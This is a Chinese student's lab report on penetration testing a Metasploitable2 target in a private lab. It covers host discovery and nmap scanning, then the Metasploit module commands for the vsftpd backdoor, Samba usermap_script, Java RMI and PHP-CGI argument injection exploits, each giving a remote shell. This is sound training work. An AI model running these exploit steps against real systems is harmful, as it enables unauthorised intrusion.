当前位置: 首页 > news >正文

20232308 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1实验要求

掌握metasploit的用法

1.2实验内容

(1)发现Metasploitable2靶机,并对其进行端口扫描、漏洞扫描;
(2)利用Vsftpd源码包后门漏洞;
(3)利用SambaMS-RPC Shell命令注入漏洞;
(4)利用Java RMI SERVER命令执行漏洞;
(5)利用PHP CGI参数执行注入漏洞。

1.3本周学习内容

掌握了metasploit的使用过程以及原理

2.实验过程

前期准备,安装好靶机
image

2.1前期渗透

(1)主机发现
在Kali中依次输入如下命令。
msfconsole //进入msf控制台
search arp_sweep //搜寻arp_sweep功能模块
use 0 //在查询结果中使用第0项模块(也可以将0换成具体模块名字)
show options //查找该模块目前已填入的参数(同时可以看到需要填写的参数)
0c3c3541-cdb0-4a91-aba5-8349a9521127
5d64b110d5a48012eda3c14519e7e8f1
查询靶机IP地址,为192.168.78.147
eda8114f-ae52-4c91-a0dc-7157509c5bb1
再返回Kali输入如下命令。set RHOSTS 192.168.78.0/24 //设置目标主机IP地址
run //开始扫描
4ae2a70c-6ec8-4d29-83da-baef3b9e6969
可以看到成功的扫描到了靶机
(2)端口扫描
nmap -p 1-2318 192.168.78.147 //扫描靶机的1-2318端口,可以看到开放的端口
786dc52153ef1230a65cd4ef75f03e8a
可以看到靶机有很多端口都是处于open状态
(3)漏洞扫描
使用命令nmap -script=vuln 192.168.78.147对靶机进行漏洞扫描。
4e2e168da6f177280e68f6012463f53b
对扫描结果进行分析,发现靶机中存在相当多漏洞,也可以看到本次实验需要要用到的21、139、1099、80端口的开放信息以及漏洞信息。
4e2e168da6f177280e68f6012463f53b
522e02a8-4377-4a87-ac1f-56a1c05770e7
72b7c722-0eb1-47d7-9393-7556dfc29ac3
通过询问ai我知道对于25端口的SMTP服务存在匿名Diffie-Hellman密钥交换漏洞和DHE_EXPORT降级漏洞。Diffie-Hellman密钥交换漏洞会导致中间人攻击,破坏通信的机密性和完整性。
对于80端口的HTTP服务存在敏感目录与文件暴露风险,Slowloris DoS漏洞和跨站请求伪造漏洞
对于1099端口的远程方法调用服务也存在漏洞,RMI注册表的默认配置允许从远程URL加载类,可导致远程代码执行。

2.2Vsftpd源码包后门漏洞(21端口)

通过学习相关知识点我知道,该漏洞的原理是在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
进入msf控制台,输入如下命令:
use exploit/unix/ftp/vsftpd_234_backdoor //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
1a94d784-16dc-4403-af14-0438ea53ede1
再利用uname –a、pwd、id、ifconfig等命令进行验证是否攻击成功
d12a2872-5a22-4b1f-9d17-b497c36d1469
可以看到我们现在已经成功的获取了靶机shell,攻击成功

2.3SambaMS-RPC Shell命令注入漏洞(端口139)

通过学习相关知识点我知道,该漏洞的原理是amba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
输入命令
use exploit/multi/samba/usermap_script //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
4516e5ca-e354-4864-ac95-8a91fba0f8e3
再利用ifconfig命令进行验证是否攻击成功,可以看到攻击成功了。
d5458f67063fc0e8a1d8f778424149fc

2.4Java RMI SERVER命令执行漏洞(1099端口)

通过学习相关知识点我知道,该漏洞的原理是Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
输入命令
use exploit/multi/misc/java_rmi_server //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
ifconfig //验证攻击是否成功
可以看到成功获得了靶机的shell,攻击成功
cbb613252f17e3898761bf6c3348e2e0
image

2.5PHP CGI参数执行注入漏洞(80端口)

通过学习相关知识点我知道,该漏洞的原理是CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
输入命令
use exploit/multi/http/php_cgi_arg_injection //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
shell //尝试打开靶机shell
d7f42278ed85dbb14b60552febaa0f1c
可以看到成功获得了靶机的shell,攻击成功

3.问题及解决方案

  • 问题1:在靶机使用ifconfig没有IP地址显示
  • 问题1解决方案:通过查询相关教程,将连接方式改为桥接,解决了问题
    image

4.学习感悟、思考等

通过本次实验,我学习了Metasploit攻击渗透实践,对Metasploit的流程以及原理都有了更深刻的理解,对主机发现、端口扫描与漏洞扫描的掌握也更加清晰
整体上来说我认为这次实验的难度不大,只有在安装靶机的时候浪费的时间比较多,后面的测试部分的整体思路类似,但是仍需要辨析每一种测试方式的原理

参考资料

  • Metasploit安装
http://www.jsqmd.com/news/42866/

相关文章:

  • directory linux
  • deepin linux 安装
  • dbca linux
  • 智慧建筑工地传感器参数一览表
  • 2025靠谱留学机构推荐TOP5!美国/英国/澳洲多国申请,高录取率机构榜单
  • 04-import 和 export
  • 藜民百信消费帮扶平台:牵手 832 平台获殊荣,让兴和县农产品出圈、农户腰包鼓
  • Ollama 部署 Qwen3:0.6B 模型操作记录
  • LiveGBS GB28181监控视频平台中如何配置文字文印或图片水印,将水印叠加到播放器或视频内容中
  • Linux 项目部署
  • curtime在MySQL触发器中的使用方法
  • Frida Hook Android手册
  • curtime与now函数在MySQL中的区别
  • Trick 总结
  • 2025年最新出炉:车载电源十大品牌性能排行榜,光伏电源/氢能源车载直流转换器/新能源车载直流转换器/高功率密度电源/军用电源产品排行
  • 成都恒利泰PIN-to-PIN 国产版 HT-LFCW-5500+
  • 身份认证状态的存储与传递( Spring Boot篇 )
  • 国标GB28181算法算力平台EasyGBS打造园区智能化安防监控高效解决方案
  • 20232306 2025-2026-1 《网络与系统攻防技术》实验六实验报告
  • 数据库基础(lab5:单表查询 三)
  • ubuntu18解决 libc.so.6: version `GLIBC_2.28‘ not found
  • current linux
  • curl linux 命令
  • 堆贪心
  • 聚焦广州少儿编程机构实力榜TOP5!课程/师资/赛事成果大公开,高性价比品牌全测评
  • 20232409 2025-2026-1 《网络与系统攻防技术》实验八实验报告
  • 2025年最受欢迎上门家教老师排行榜,上门家教/一对一家教老师口碑推荐榜
  • 是时候从 MySQL 转到 PostgreSQL 18 了
  • 小程序客服系统客服软件--如何接入ttkefu
  • count函数在oracle中的使用场景有哪些